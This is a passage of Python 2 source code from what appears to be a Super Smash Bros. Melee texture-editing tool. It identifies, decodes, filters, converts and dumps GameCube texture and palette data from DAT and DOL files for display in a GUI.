e2eHeaderOffset = structStart + pointer
textureCount, imageType, _, width, height = struct.unpack( '>5I', datFile.data[e2eHeaderOffset:e2eHeaderOffset+0x14] )
imageDataPointersStart = e2eHeaderOffset + 0x18
imageDataPointersEnd = imageDataPointersStart + ( 4 * textureCount )
imageDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersStart:imageDataPointersEnd] )
if imageType == 9:
paletteDataPointersEnd = imageDataPointersEnd + ( 4 * textureCount )
paletteDataPointerValues = struct.unpack( '>' + textureCount * 'I', datFile.data[imageDataPointersEnd:paletteDataPointersEnd] )
for i, offset in enumerate( imageDataPointerValues ):
imageDataOffset = structStart + offset
if imageType == 9:
# Need to get the palette data's offset too. Its pointer is within a list following the image data pointer list
paletteDataOffset = structStart + paletteDataPointerValues[i]
texturesInfo.append( (imageDataOffset, e2eHeaderOffset, paletteDataOffset, e2eHeaderOffset, width, height, imageType, 0) )
else:
texturesInfo.append( (imageDataOffset, e2eHeaderOffset, -1, -1, width, height, imageType, 0) )
# Get the data section structure offsets, and separate out main structure references
hI = datFile.headerInfo
dataSectionStructureOffsets = set( datFile.structureOffsets ).difference( (-0x20, hI['rtStart'], hI['rtEnd'], hI['rootNodesEnd'], hI['stringTableStart']) )
# Scan the data section by analyzing generic structures and looking for standard image data headers
for structureOffset in dataSectionStructureOffsets:
if structureOffset in imageDataOffsetsFound: continue # This is a structure of raw image data, which has already been added
# Get the image data header struct's data.
try: # Using a try block because the last structure offsets may raise an error (unable to get 0x18 bytes) which is fine
structData = datFile.getData( structureOffset, 0x18 )
except:
continue
# Unpack the values for this structure, assuming it's an image data header
fieldValues = struct.unpack( '>IHHIIff', structData )
imageDataOffset, width, height, imageType, mipmapFlag, minLOD, maxLOD = fieldValues
if imageDataOffset in imageDataOffsetsFound: continue # Already added this one
elif imageDataOffset not in dataSectionStructureOffsets: continue # Not a valid pointer/struct offset!
# Check specific data values for known restrictions
if width < 1 or height < 1: continue
elif width > 1024 or height > 1024: continue
elif imageType not in ( 0, 1, 2, 3, 4, 5, 6, 8, 9, 10, 14 ): continue
elif mipmapFlag > 1: continue
elif minLOD > 10 or maxLOD > 10: continue
elif minLOD > maxLOD: continue
# Check for a minimum size on the image data block. Most image types require at least 0x20 bytes for even just a 1x1 pixel image
childStructLength = datFile.getStructLength( imageDataOffset )
if childStructLength == -1: pass # Can't trust this; unable to calculate the length (data must be after the string table)
elif imageType == 6 and childStructLength < 0x40: continue
elif childStructLength < 0x20: continue
# Check if the child (image data) has any children (which it shouldn't)
childFound = False
for pointerOffset in datFile.pointerOffsets:
if pointerOffset >= imageDataOffset:
if pointerOffset < imageDataOffset + childStructLength: # Pointer found in data block
childFound = True
break
if childFound: continue
# Finally, check that the struct length makes sense (doing this last to avoid the performance hit)
structLength = datFile.getStructLength( structureOffset ) # This length will include any padding too
if structLength < 0x18 or structLength > 0x38: continue # 0x18 + 0x20
texturesInfo.append( (imageDataOffset, structureOffset, -1, -1, width, height, imageType, int(maxLOD)) ) # Palette info will be found later
imageDataOffsetsFound.add( imageDataOffset )
except Exception as err:
print 'Encountered an error during texture identification:'
print err
# toc = time.clock()
# print 'image identification time:', toc - tic
return texturesInfo
def scanDol():
updateProgramStatus( 'Scanning File....' )
# Update the GUI's basic file attributes.
if globalDatFile.source == 'disc':
fileSize = Gui.isoFileTree.item( globalDatFile.path, 'values' )[3]
else:
fileSize = os.path.getsize( Gui.datDestination.get().replace('"', '') )
Gui.datFilesizeText.set( 'File Size: ' + "{:,}".format(int(fileSize)) + ' bytes' )
# Make sure this is a DOL for SSBM, check the version, and get the starting point for the textures
# Check the DOL for a string of "Super Smash Bros. Melee" at specific places
ssbmStringBytes = bytearray()
ssbmStringBytes.extend( "Super Smash Bros. Melee" )
if globalDatFile.data[0x3B78FB:0x3B7912] == ssbmStringBytes: # NTSC 1.02
textureTableStart = 0x409d40
totalTextures = 287
elif globalDatFile.data[0x3B6C1B:0x3B6C32] == ssbmStringBytes: # NTSC 1.01
textureTableStart = 0x409060
totalTextures = 287
elif globalDatFile.data[0x3B5A3B:0x3B5A52] == ssbmStringBytes: # NTSC 1.00
textureTableStart = 0x407D80
totalTextures = 287
elif globalDatFile.data[0x3B75E3:0x3B75FA] == ssbmStringBytes: # PAL 1.00
textureTableStart = 0x040C4E0
totalTextures = 146
else: # This DOL doesn't seem to be SSBM
print 'Non SSBM DOL recieved.'
return
# There are no headers for these images, but they all have the same properties.
width = 32
height = 32
imageType = 0
imageDataLength = 0x200
scanEndToEndImageData( textureTableStart, width, height, imageType, imageDataLength, totalTextures )
def scanEndToEndImageData( textureTableStart, width, height, imageType, imageDataLength, totalTextures ):
# If this function is called while already processing a file, cancel the last instance of the loop. (The last function instance will then re-call this to scan the new file.)
global scanningDat, stopAndScanNewDat
texturesFound = 0
texturesFiltered = 0
scanningDat = True
for i in xrange(0, totalTextures):
imageDataOffset = textureTableStart + (0x200 * i)
if stopAndScanNewDat:
scanningDat = False
stopAndScanNewDat = False
clearDatTab()
scanDat()
return
elif programClosing:
Gui.root.destroy()
return
elif not passesImageFilters(imageDataOffset, width, height, imageType):
texturesFiltered += 1
else:
try: # To create the full image.
imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
newImg = tplDecoder( '', (width, height), imageType, None, imageData )
newImg.deblockify() # Decodes the image data, to create an rgbaPixelArray.
currentTex = Image.new( 'RGBA', (width, height) )
currentTex.putdata( newImg.rgbaPixelArray )
# Store the full ImageTk image so it's not garbage collected
Gui.datTextureTree.fullTextureRenders[imageDataOffset] = ImageTk.PhotoImage( currentTex )
# Create a 64x64 thumbnail/preview image, and store it so it's not garbage collected
currentTex.thumbnail( (64, 64), Image.ANTIALIAS )
Gui.datTextureTree.textureThumbnails[imageDataOffset] = ImageTk.PhotoImage( currentTex )
texturesFound += 1
except Exception as err:
# Store the error image so it's not garbage collected
Gui.datTextureTree.fullTextureRenders[imageDataOffset] = Gui.imageBank( 'noImage' )
Gui.datTextureTree.textureThumbnails[imageDataOffset] = Gui.imageBank( 'noImage' )
print 'Failed to decode texture at 0x{:X}; {}'.format( imageDataOffset, err )
# Add this texture to the DAT Texture Tree tab.
Gui.datTextureTree.insert( '', 'end', # '' = parent = root, 'end' = insert position
iid=imageDataOffset, # Becomes a string once it's assigned
image=Gui.datTextureTree.textureThumbnails[imageDataOffset],
values=(
uHex(imageDataOffset) + '\n('+uHex(imageDataLength)+')', # offset to image data, and data length
(str(width)+' x '+str(height)), # width and height
'_'+str(imageType)+' ('+imageFormats[imageType]+')' # the image type and format
),
tags=()
)
# Update the GUI.
if texturesFound % 5 == 0:
Gui.texturesFoundText.set( 'Textures Found: ' + str(texturesFound) )
Gui.texturesFilteredText.set( 'Filtered Out: ' + str(texturesFiltered) )
Gui.datTextureTree.update()
scanningDat = False
Gui.texturesFoundText.set( 'Textures Found: ' + str(texturesFound) )
Gui.texturesFilteredText.set( 'Filtered Out: ' + str(texturesFiltered) )
Gui.totalTextureSpaceText.set( "Total Texture Size: {:,} b".format(imageDataLength*totalTextures) )
def passesImageFilters( imageDataOffset, width, height, imageType ):
""" Used to pass or filter out textures displayed in the DAT Texture Tree tab when loading files.
Accessed and controled by the main menu's "Settings -> Adjust Texture Filters" option. """
aspectRatio = float(width) / height
def comparisonPasses( subjectValue, comparator, limitingValue ):
if comparator == '>' and not (subjectValue > limitingValue): return False
if comparator == '>=' and not (subjectValue >= limitingValue): return False
if comparator == '=' and not (subjectValue == limitingValue): return False
if comparator == '<' and not (subjectValue < limitingValue): return False
if comparator == '<=' and not (subjectValue <= limitingValue): return False
return True
# For each setting, break the value into its respective components (comparator & filter value), and then run the appropriate comparison.
widthComparator, widthValue = imageFilters['widthFilter']
if widthValue != '' and not isNaN(int(widthValue)):
if not comparisonPasses( width, widthComparator, int(widthValue) ): return False
heightComparator, heightValue = imageFilters['heightFilter']
if heightValue != '' and not isNaN(int(heightValue)):
if not comparisonPasses( height, heightComparator, int(heightValue) ): return False
aspectRatioComparator, aspectRatioValue = imageFilters['aspectRatioFilter']
if aspectRatioValue != '':
if ':' in aspectRatioValue:
numerator, denomenator = aspectRatioValue.split(':')
aspectRatioValue = float(numerator) / float(denomenator)
elif '/' in aspectRatioValue:
numerator, denomenator = aspectRatioValue.split('/')
aspectRatioValue = float(numerator) / float(denomenator)
else: aspectRatioValue = float(aspectRatioValue)
if not isNaN(aspectRatioValue) and not comparisonPasses( aspectRatio, aspectRatioComparator, aspectRatioValue ): return False
imageTypeComparator, imageTypeValue = imageFilters['imageTypeFilter']
if imageTypeValue != '' and not isNaN(int(imageTypeValue)):
if not comparisonPasses( imageType, imageTypeComparator, int(imageTypeValue) ): return False
offsetComparator, offsetValue = imageFilters['offsetFilter']
if offsetValue.startswith('0x') and offsetValue != '' and not isNaN(int(offsetValue, 16)):
if not comparisonPasses( imageDataOffset + 0x20, offsetComparator, int(offsetValue, 16) ): return False
elif offsetValue != '' and not isNaN(int(offsetValue)):
if not comparisonPasses( imageDataOffset + 0x20, offsetComparator, int(offsetValue) ): return False
return True
def parseTextureDetails( iid ):
imageDataDetails, dimensions, imageType = Gui.datTextureTree.item( iid, 'values' )
imageDataOffset = int( iid )
imageDataLength = int( imageDataDetails.split('(')[1].replace(')', ''), 16 )
width, height = [ int( dim.strip() ) for dim in dimensions.split('x') ]
imageType = int( imageType.split()[0].replace('_', '') )
return imageDataOffset, imageDataLength, width, height, imageType
def getMipmapLevel( iid ):
if Gui.datTextureTree.exists( iid ) and 'mipmap' in Gui.datTextureTree.item( iid, 'tags' ):
mipmapLevel = 0
if Gui.datTextureTree.parent( iid ): # This item is a child of a parent mipmap texture
for level in Gui.datTextureTree.get_children( Gui.datTextureTree.parent(iid) ):
mipmapLevel += 1
if level == iid: break
else: mipmapLevel = -1
return mipmapLevel
def getImageDataLength( width, height, imageType ): # Arguments should each be ints.
byteMultiplyer = { # Defines the bytes required per pixel for each image type.
0: .5, 1: 1, 2: 1, 3: 2, 4: 2, 5: 2, 6: 4, 8: .5, 9: 1, 10: 2, 14: .5 }
blockDimensions = { # Defines the block width and height for each image type.
0: (8,8), 1: (8,4), 2: (8,4), 3: (4,4), 4: (4,4), 5: (4,4), 6: (4,4), 8: (8,8), 9: (8,4), 10: (4,4), 14: (8,8) }
# Calculate based on all encoded pixels (including those in unused block areas), not just the visible ones of the given dimensions.
blockWidth, blockHeight = blockDimensions[imageType]
trueWidth = math.ceil( float(width) / blockWidth ) * blockWidth
trueHeight = math.ceil( float(height) / blockHeight ) * blockHeight
return int( trueWidth * trueHeight * byteMultiplyer[imageType] ) # Result is in bytes.
def getPaletteInfo( datFile, imageDataOffset ):
""" Doesn't get the palette data itself, but attempts to find/return information on it. There is hardcoded information for certain files,
which are checked first, followed by checks for effects files. Standard DAT/USD files are then checked using two different methods,
by looking through the structure hierarchy from the bottom upwards. The first method looks for a path from Image Headers to Texture
structures, in order to get the palette header's offset and other info. The second method (if the first fails), checks for a Image
Data Array structure, and then the parent Texture Animation Struct. From there, the palette header array structure and respective
palette header for the target image can be found.
This returns a tuple of info in the form ( paletteDataOffset, paletteHeaderOffset, paletteLength, paletteType, paletteColorCount ) """
# Handle special cases for certain files
if (0x1E00, 'MemSnapIconData') in datFile.rootNodes: # The file is LbMcSnap.usd or LbMcSnap.dat (Memory card banner/icon file from SSB Melee)
# There's only one palette that might be desired in here (no headers available).
return 0x1C00, -1, 0x200, 2, 256
elif (0x4E00, 'MemCardIconData') in datFile.rootNodes: # The file is LbMcGame.usd or LbMcGame.dat (Memory card banner/icon file from SSB Melee)
return 0x4C00, -1, 0x200, 2, 256
elif isEffectsFile( datFile ): # These have normal structuring as well as some unique table structuring
imageDataStruct = datFile.getStruct( imageDataOffset )
# The unique structuring should have already saved the palette info
if imageDataStruct and imageDataStruct.paletteDataOffset != -1 and imageDataStruct.paletteHeaderOffset != -1:
return ( imageDataStruct.paletteDataOffset, imageDataStruct.paletteHeaderOffset, 0x200, 2, 256 )
# Proceeding to check within standard DAT/USD files
headerOffsets = datFile.getStruct( imageDataOffset ).getParents()
paletteHeaderStruct = None
for imageHeaderOffset in headerOffsets:
imageDataHeader = datFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderOffset, printWarnings=False )
if not imageDataHeader: continue
for headerParentOffset in imageDataHeader.getParents():
# Test for a Texture Struct
textureStruct = datFile.initSpecificStruct( hsdStructures.TextureObjDesc, headerParentOffset, printWarnings=False )
if textureStruct:
# Texture Struct Found; initialize the child palette header structure
paletteHeaderOffset = textureStruct.getValues()[22]
paletteHeaderStruct = datFile.initSpecificStruct( hsdStructures.PaletteObjDesc, paletteHeaderOffset, textureStruct.offset )
break
else:
# Test for an Image Data Array structure
imageHeaderArrayStruct = datFile.initSpecificStruct( hsdStructures.ImageHeaderArray, headerParentOffset, printWarnings=False )
if imageHeaderArrayStruct:
# Get the parent Texture Animation Struct, to get the palette header array offset
texAnimStructOffset = imageHeaderArrayStruct.getAnyDataSectionParent()
texAnimStruct = datFile.initSpecificStruct( hsdStructures.TexAnimDesc, texAnimStructOffset, printWarnings=False )
if texAnimStruct:
paletteIndex = imageHeaderArrayStruct.getValues().index( imageHeaderOffset )
# Make sure there is a palette header array structure (there may not be one if a palette is shared!)
if texAnimStruct.offset + 0x10 in datFile.pointerOffsets:
# Palette header array struct present. Get the corresponding palette header offset and structure
paletteHeaderArrayOffset = texAnimStruct.getValues()[4]
paletteHeaderPointerOffset = paletteHeaderArrayOffset + ( paletteIndex * 4 )
paletteHeaderOffset = struct.unpack( '>I', datFile.getData(paletteHeaderPointerOffset, 4) )[0] # Grabbing 4 bytes and unpacking them
paletteHeaderStruct = datFile.initSpecificStruct( hsdStructures.PaletteObjDesc, paletteHeaderOffset, paletteHeaderArrayOffset )
elif paletteIndex == 0: # The first texture should have a normal Texture struct as well, so just move on to that.
continue
else: # Must share a palette with the first texture
# Get the image data structure for the first texture in the array
imageDataHeader = datFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderArrayStruct.values[0] )
imageDataOffset = imageDataHeader.getValues()[0]
imageDataStruct = datFile.initDataBlock( hsdStructures.ImageDataBlock, imageDataOffset, imageDataHeader.offset )
# Check the image data's parents to get the other image data header (the one that leads to a Texture Struct)
for headerOffset in imageDataStruct.getParents().difference( (imageDataHeader.offset,) ): # Excluding the image data header above
imageDataHeader = datFile.initSpecificStruct( hsdStructures.ImageObjDesc, headerOffset, printWarnings=False )
if not imageDataHeader: continue
for headerParentOffset in imageDataHeader.getParents():
textureStruct = datFile.initSpecificStruct( hsdStructures.TextureObjDesc, headerParentOffset, printWarnings=False )
if not textureStruct: continue
# Texture Struct Found; initialize the child palette header structure
paletteHeaderOffset = textureStruct.getValues()[22]
paletteHeaderStruct = datFile.initSpecificStruct( hsdStructures.PaletteObjDesc, paletteHeaderOffset, textureStruct.offset )
break
if paletteHeaderStruct: break
break
if paletteHeaderStruct: break
if paletteHeaderStruct:
paletteDataOffset, paletteType, _, colorCount = paletteHeaderStruct.getValues()
paletteLength = datFile.getStructLength( paletteDataOffset )
return ( paletteDataOffset, paletteHeaderStruct.offset, paletteLength, paletteType, colorCount )
else:
return ( -1, -1, None, None, None )
def getPaletteData( datFileObj, imageDataOffset=-1, paletteDataOffset=-1, imageData=None, imageType=-1 ):
""" Gets palette data from the file, looking up palette info if needed. If image data is provided, it is checked
to determine how many colors are actually used (colorCount from the palette data header cannot be trusted). """
# Get the offset of the palette data, if not provided
if paletteDataOffset == -1:
assert imageDataOffset != -1, 'Image data offset not provided to get palette data!'
paletteDataOffset, _, paletteLength, paletteType, colorCount = getPaletteInfo( datFileObj, imageDataOffset )
else:
paletteLength = datFileObj.getStructLength( paletteDataOffset )
paletteType = -1
colorCount = -1
if imageData:
if imageType == 8: # Break up every byte into two 4-bit values
paletteIndexArray = [ x for i in imageData for x in (i>>4, i&0b1111) ]
elif imageType == 9: # Can just use the original bytearray (each entry is 1 byte)
paletteIndexArray = imageData
elif imageType == 10: # Combine half-word bytes
paletteIndexArray = struct.unpack( '>{}H'.format(len(imageData)/2), imageData )
else:
raise Exception( 'Invalid image type given to getPaletteData: ' + str(imageType) )
colorCount = max( paletteIndexArray ) + 1
paletteData = datFileObj.getData( paletteDataOffset, colorCount * 2 ) # All palette types are two bytes per color
else:
# Without the image data, we can't really trust the color count, especially for some older texture hacks
assert paletteLength, 'Invalid palette length to get palette data: ' + str(paletteLength)
paletteData = datFileObj.getData( paletteDataOffset, paletteLength )
return paletteData, paletteType
def renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=True ):
""" Decodes image data from the globally loaded DAT file at a given offset and creates an image out of it. This then
stores/updates the full image and a preview/thumbnail image (so that they're not garbage collected) and displays it in the GUI.
The image and its info is then displayed in the DAT Texture Tree tab's treeview (does not update the Dat Texture Tree subtabs).
allowImageDumping is False when this function is used to 're-load' image data,
(such as after importing a new texture, or modifying the palette of an existing one),
so that image modifications don't overwrite texture dumps. """
#tic = time.clock()
problemWithImage = False
try:
imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
if imageType == 8 or imageType == 9 or imageType == 10: # Gather info on the palette.
paletteData, paletteType = getPaletteData( globalDatFile, imageDataOffset )
else:
paletteData = ''
paletteType = None
newImg = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
newImg.deblockify() # This decodes the image data, creating an rgbaPixelArray.
# Create an image with the decoded data
textureImage = Image.new( 'RGBA', (width, height) )
textureImage.putdata( newImg.rgbaPixelArray )
except Exception as errMessage:
print 'Unable to make out a texture for data at', uHex(0x20+imageDataOffset)
print errMessage
problemWithImage = True
# toc = time.clock()
# print 'time to decode image for', hex(0x20+imageDataOffset) + ':', toc-tic
# Store the full image (or error image) so it's not garbage collected, and generate the preview thumbnail.
if problemWithImage:
# The error image is 64x64, so it doesn't need to be resized for the thumbnail.
Gui.datTextureTree.fullTextureRenders[imageDataOffset] = Gui.imageBank( 'noImage' )
Gui.datTextureTree.textureThumbnails[imageDataOffset] = Gui.imageBank( 'noImage' )
else:
if allowImageDumping and generalBoolSettings['dumpPNGs'].get():
textureImage.save( buildTextureDumpPath(globalDatFile, imageDataOffset, imageType, '.png') )
Gui.datTextureTree.fullTextureRenders[imageDataOffset] = ImageTk.PhotoImage( textureImage )
textureImage.thumbnail( (64, 64), Image.ANTIALIAS )
Gui.datTextureTree.textureThumbnails[imageDataOffset] = ImageTk.PhotoImage( textureImage )
# If this item has already been added to the treeview, update the preview thumbnail of the texture.
iid = str( imageDataOffset )
if Gui.datTextureTree.exists( iid ):
Gui.datTextureTree.item( iid, image=Gui.datTextureTree.textureThumbnails[imageDataOffset] )
if not problemWithImage: return True
else: return False
def decodeTextureData( textureProperties, datFileObj, resultQueue, dumpImage ):
""" Only used when multi-process texture decoding is enabled.
Decodes texture data from the globally loaded DAT file at a given offset and creates a viewable image. The finished image
is placed into a queue for rendering to the GUI. This is because this function will be run in a separate process for
performance gains, however only the main thread may be allowed to do any GUI updates (or else there may be freezes).
The dumpImage argument should be False when this function is used to 're-load' image data,
(such as after importing a new texture, or modifying the palette of an existing one), so that image
modifications don't overwrite original texture dumps. Until the next time the program is opened, anyway. """
try:
#print 'processing', hex(0x20+imageDataOffset), 'with', multiprocessing.current_process().name
# tic = time.clock()
imageDataOffset, width, height, imageType, imageDataLength = textureProperties
imageData = datFileObj.getData( imageDataOffset, imageDataLength )
if imageType == 8 or imageType == 9 or imageType == 10: # Gather info on the palette.
paletteData, paletteType = getPaletteData( datFileObj, imageDataOffset )
else:
paletteData = ''
paletteType = None
# print 'time to resolve palette:', time.clock() - tic
# tic = time.clock()
# print '\n\tbeginning decoding', hex(len(imageData)), 'data at offset', hex(imageDataOffset)
newImg = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
newImg.deblockify() # This decodes the image data, creating an rgbaPixelArray.
# from v5.3
textureImage = Image.new( 'RGBA', (width, height) )
textureImage.putdata( newImg.rgbaPixelArray )
#textureImage = Image.new( 'RGBA', (width, height) )
#byteStringData = ''.join([chr(pixel[0])+chr(pixel[1])+chr(pixel[2])+chr(pixel[3]) for pixel in newImg.rgbaPixelArray])
#rawImageData = (c_ubyte * 4 * width * height).from_buffer_copy(byteStringData)
#textureImage = Image.frombuffer( 'RGBA', (width, height), byteStringData, 'raw', 'RGBA', 0, 1 )
#textureImage = Image.fromarray( newImg.rgbaPixelArray, 'RGBA' )
#textureImage = Image.frombytes( 'RGBA', (width, height), bytes(newImg.decodedImage) )
# toc = time.clock()
# print 'time to decode image: ', toc-tic, ' for', hex(0x20+imageDataOffset)
# tic = time.clock()
if dumpImage:
try:
textureImage.save( buildTextureDumpPath(datFileObj, imageDataOffset, imageType, '.png') )
except Exception as err:
print 'Unable to create texture dump:'
print err
# print 'time to dump texture:', time.clock()-tic
# Add the result into the queue
#if not shutdownEvent.is_set():
resultQueue.put( (textureImage, imageDataOffset) )
#root.event_generate( '<<message>>', when='mark' )
except Exception as err:
print 'Failure during image decoding:'
print err
resultQueue.put( (None, imageDataOffset) )
def getImageFileAsPNG( filepath ): # may be depricated
if not os.path.exists( filepath ):
return ( 'filepath for getImageFileAsPNG not found', 'noFileFound' )
filename = os.path.split( filepath )[1]
fileFormat = os.path.splitext( filename )[1].lower()
with open( filepath, 'rb' ) as binaryFile:
if fileFormat == '.tpl':
status = 'formatSupported'
elif fileFormat == '.png':
# Get image attributes.
# binaryFile.seek(16)
# width = toInt( binaryFile.read(4) )
# height = toInt( binaryFile.read(4) )
# bitDepth = toInt( binaryFile.read(1) )
# colorType = toInt( binaryFile.read(1) )
# Get the image data.
binaryFile.seek(0)
imageHex = hexlify( binaryFile.read() ) # This would actually be a bytes string. might need to fix that
status = 'dataObtained'
else:
imageHex = ''
status = 'formatUnsupported' # Not a PNG or TPL.
# File is closed for reading.
if status != 'formatUnsupported' and fileFormat == '.tpl': # Not performed in the if-then above so that the file can first be closed.
## Convert the image to TPL format.
( exitCode, outputStream ) = cmdChannel( '"' + wimgtPath + '" copy "' + filepath + '" - -x .png' )
if exitCode == 0:
encodedStream = hexlify( outputStream )
startOfData = encodedStream.find('89504e470d0a1a0a') ## 16 char PNG file ID.
imageHex = encodedStream[startOfData:]
status = 'dataObtained'
else:
status = 'failed wimgt conversion'
imageHex = outputStream
return ( status, imageHex )
def getImageFileAsTPL( filepath, originalTextureType ):
# Check what formatting (image type) the texture should have in-game, and the current file format
imageType = codecBase.parseFilename( os.path.basename( filepath ) )[0]
fileFormat = os.path.splitext( filepath )[1].lower()
if imageType == -1: imageType = originalTextureType
imageHeader = ''
imageData = ''
paletteHeader = ''
paletteData = ''
with open( filepath.replace('\\', '/') , 'rb' ) as binaryFile:
if fileFormat == '.tpl':
# Get image attributes.
binaryFile.seek( 0xC )
imageHeaderAddress = toInt( binaryFile.read(4) )
paletteHeaderOffset = toInt( binaryFile.read(4) )
binaryFile.seek( paletteHeaderOffset )
paletteEntries = hexlify( binaryFile.read(2) )
binaryFile.seek( 4, 1 ) # Seek from the current location.
paletteType = '0000' + hexlify( binaryFile.read(2) )
binaryFile.seek( imageHeaderAddress )
height = hexlify( binaryFile.read(2) )
width = hexlify( binaryFile.read(2) )
#imageType = hexlify( binaryFile.read(4) )
#imageDataOffset = toInt( binaryFile.read(4) )
binaryFile.seek( 4 )
fileBinary = hexlify( binaryFile.read() )
status = 'dataObtained'
elif fileFormat == '.png':
# Get image attributes.
binaryFile.seek(16)
width = hexlify( binaryFile.read(4) )[4:]
height = hexlify( binaryFile.read(4) )[4:]
bitDepth = toInt( binaryFile.read(1) )
colorType = toInt( binaryFile.read(1) )
if colorType == 3: # The image is palette based.
pngBinary = hexlify( binaryFile.read() )
status = 'formatSupported'
else:
status = 'formatUnsupported'
# If the file is a PNG, convert it to TPL.
if status != 'formatUnsupported' and fileFormat == '.png':
## Set the appropriate encoding.
if imageType == 0: encoding='i4'
elif imageType == 1: encoding='i8'
elif imageType == 2: encoding='ia4'
elif imageType == 3: encoding='ia8'
elif imageType == 4: encoding='rgb565'
elif imageType == 5: encoding='rgb5a3'
elif imageType == 6: encoding='rgba32'
elif imageType == 8: encoding='c4'
elif imageType == 9: encoding='c8'
elif imageType == 10: encoding='c14x2'
elif imageType == 14: encoding='cmpr'
else:
return ( 'imageTypeNotFound', '', '', '', '' )
# If the image uses a palette, check if it contains transparency. Start by checking the colorType.
# Then, if an alpha channel is not found, fall back on scanning the palette for magenta.
# (The standard check on the PNG's colorType will not reveal whether the texture should have
# transparency for a particular palette index. And if a palette is present, then there cannot be
# an alpha channel.) Finally, if a palette is found, also check for the tRNS ancillary transparency chunk.
dataWithAdHocPalette = False
if imageType == 8 or imageType == 9 or imageType == 10:
transparencyDetected = False
if colorType == 4 or colorType == 6: ## The image has an alpha channel.
transparencyDetected = True
dataWithAdHocPalette = True ## Mark that the palette will be created on-the-fly.
elif colorType == 3:
## The image has a palette. Transparency will be evaluated by scanning for magenta.
startOfPalette = pngBinary.find('504c5445') ## Search for palette by the Chunk Type, PLTE.
if startOfPalette != -1:
paletteLength = int( int(pngBinary[startOfPalette-8:startOfPalette], 16)*2 ) ## Palette length, in nibbles.
##paletteEntries = paletteByteLength/3
palette = pngBinary[startOfPalette+8:startOfPalette+8+paletteLength]
## Iterate over the palette entries, looking for magenta ('ff00ff')
for i in xrange(0, paletteLength, 6): ## Uses a step of 6, which encompasses one RGB palette entry.
if palette[i:i+6] == 'ff00ff':
transparencyDetected = True
break
if not transparencyDetected:
## One last check for transparency....
if pngBinary.find('74524e53') != -1: ## Search for ancillary transparency chunk (Chunk Type tRNS).
transparencyDetected = True
else: ## Image should have a palette, but one was not found.
return ( 'formatUnsupported', '', '', '', '' )
else:
## colorType is 0 or 2 (i.e. no palette or alpha channel detected). Assume correct.
dataWithAdHocPalette = True ## Mark that the palette will be created on-the-fly.
if transparencyDetected:
encoding = encoding + '.P-RGB5A3'
paletteType = '00000002'
else:
encoding = encoding + '.P-RGB565'
paletteType = '00000001'
## With the collected image info, convert the image to TPL format.
( exitCode, outputStream ) = cmdChannel( '"' + wimgtPath + '" copy "' + filepath + '" - -x tpl.' + encoding )
if exitCode == 0:
fileBinary = hexlify( outputStream ).split('0020af30')[1]
if dataWithAdHocPalette: status = 'dataWithAdHocPalette'
else: status = 'dataObtained'
else: return ( exitCode, outputStream, '', '', '' )
## At this point, the file's binary should be standardized as a hex array, while missing the first 4 bytes.
if status == 'dataObtained' or status == 'dataWithAdHocPalette':
if imageType == 8 or imageType == 9 or imageType == 10:
## Image has a palette that needs moving.
## Since the file identifier has been removed, 4 bytes need to be subtracted from any offset relative to the file beginning.
## Indexing of the hex string is per nibble, not per byte, so intergers for iteration need to be doubled.
imageHeaderOffset = int(fileBinary[16:24], 16) ## Hex string to integer conversion of 4 bytes.
imageHeaderAddress = (imageHeaderOffset - 4)*2
## Separate out the palette, change the magenta to transparent, and change lime green to the drop-shadow color.
paletteData = fileBinary[56:imageHeaderAddress]
paletteLength = len(paletteData)
paletteEntries = paletteLength/4
for i in xrange(paletteLength, 0, -4): ## Iterate backwards through the palette data, seeking magenta.
if paletteData[i-4:i] == 'fc1f':
paletteData = paletteData[:i-4] + '0000' + paletteData[i:] ## Replace magenta with full transparency.
break
for i in xrange(paletteLength, 0, -4): ## Iterate backwards through the palette data, seeking lime green.
if paletteData[i-4:i] == '83e0':
paletteData = paletteData[:i-4] + '3000' + paletteData[i:] ## Replace lime green with the drop-shadow.
break
imageDataOffset = int(fileBinary[imageHeaderAddress + 16:imageHeaderAddress + 24], 16)
imageData = fileBinary[(imageDataOffset - 4)*2:] ## 0x260 = 608, 608 - the offset of 8 lost with the file identifier = 600.
paletteHeader = paletteType + '00000000' + "{0:0{1}X}".format(paletteEntries, 4) # This is in the format that would appear in a file, but without the paletteDataOffset.
else:
## No palette. Return just the image data.
imageData = fileBinary[120:] ## 0x40 -> 64. 2(64 - 4) = 120
imageHeader = width + height + "{0:0{1}X}".format(imageType, 8) # This is in the format that would appear in a file, but without the imageDataOffset.
## The returned imageData will be a bytearray, except for cases with conversion errors, in which case it will be a string.
return (status, imageHeader, imageData, paletteHeader, paletteData) # All returned values are strings.
def buildTextureDumpPath( datFileObj, imageDataOffset, imageType, extension ):
""" Creates a save/destination path for new image files being dumped from the program.
Only used for dumping images from a globally loaded DAT file (not banners). """
sourceDatFilename = os.path.basename( datFileObj.path ).split('_')[-1]
newFileName = sourceDatFilename + '_' + uHex(imageDataOffset + 0x20) + '_' + str(imageType)
# Get the Game ID if this file was loaded from a disc.
if datFileObj.source == 'disc' and globalDiscDetails['gameId'] != '':
# Means an ISO has been loaded, and (looking at the file path) the current dat is not from an outside standalone file.
gameID = globalDiscDetails['gameId']
else: gameID = 'No Associated Disc'
# Construct the destination file path, and create the folders if they don't already exist.
destinationFolder = texDumpsFolder + '\\' + gameID + '\\' + sourceDatFilename + '\\'
if not os.path.exists( destinationFolder ): os.makedirs( destinationFolder )
return destinationFolder + newFileName + extension
def updateEntryHex( event, widget=None ):
""" Updates hex data in a hex entry field to the currently loaded DAT file.
Able to update multiple locations in the file if widget.offset is a list of offsets. """
# Get the entry widget containing details on this edit
if not widget:
widget = event.widget
# Validate the input
newHex = widget.get().zfill( widget.byteLength * 2 ).upper() # Pads the string with zeroes to the left if not enough characters
if not validHex( newHex ):
msg( 'The entered text is not valid hexadecimal!' )
return
# Confirm whether updating is necessary by checking if this is actually new data for any of the offset locations
if type( widget.offsets ) == list:
for offset in widget.offsets:
currentFileHex = hexlify( globalDatFile.getData(offset, widget.byteLength) ).upper()
if currentFileHex != newHex: # Found a difference
break
else: # The loop above didn't break; no change found
return # No change to be updated
else: # The offsets attribute is just a single value (the usual case)
